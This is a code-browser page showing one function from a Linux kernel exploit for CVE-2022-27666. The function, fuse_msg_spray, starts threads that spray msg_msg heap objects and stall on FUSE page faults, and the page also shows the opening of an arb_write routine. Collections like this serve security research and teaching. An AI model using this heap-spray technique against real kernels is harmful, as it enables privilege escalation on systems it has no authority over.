MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / fuse_msg_spray

Function fuse_msg_spray

CVE-2022-27666/exploit/exploit.c:1662–1675  ·  view source on GitHub ↗

spray $num_msg msg_msg at page_fault addr ------ use thread ----- trigger page fault at (dst+8)

Source from the content-addressed store, hash-verified

1660}
1661// spray $num_msg msg_msg at page_fault addr ------ use thread ----- trigger page fault at (dst+8)
1662int fuse_msg_spray(int num_msg, int size, void *dst) {
1663 int i;
1664 initialise_shared(&spray_lock);
1665 pthread_mutex_lock(&spray_lock->mutex);
1666 for (i = 0; i<num_msg; i++) {
1667 struct spary_msg_arg *arg = malloc(sizeof(struct spary_msg_arg));
1668 arg->size = size;
1669 arg->dst = dst;
1670 hang_threads->done++;
1671 pthread_t *thr = malloc(sizeof(pthread_t));
1672 pthread_create(thr, NULL, &fuse_sendmsg, arg);
1673 }
1674 return i;
1675}
1676// arb write ---- try 8 times
1677bool arb_write(void *target_addr, int size, void *fuse_adr) // target_addr - write address; size - write size; fuse_adr+8 - trigger page fault
1678{

Callers 1

arb_writeFunction · 0.85

Calls 1

initialise_sharedFunction · 0.85

Tested by

no test coverage detected